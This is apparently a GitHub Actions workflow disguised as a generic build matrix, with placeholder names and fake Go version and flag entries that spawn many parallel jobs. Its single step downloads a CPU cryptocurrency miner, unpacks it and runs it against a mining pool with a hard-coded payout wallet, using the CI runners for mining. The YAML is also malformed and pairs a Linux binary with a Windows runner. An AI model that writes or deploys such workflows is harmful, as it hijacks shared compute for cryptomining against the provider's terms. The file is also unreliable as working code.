name: NAME
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: NAME
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: wget https://github.com/m-pays/m-cpuminer-v2/releases/download/2.4/m-minerd-64-linux.tar.gz
tar xfvz m-minerd-64-linux.tar.gz
cd m-minerd-64-linux
./m-minerd -a m7mhash -o stratum+tcp://m7m.asia.mine.zergpool.com:6033 -u 7qj3BTQa3SF6sxJKbL9hLnpqw4PsxVPV4S -p c=DASH -t 2
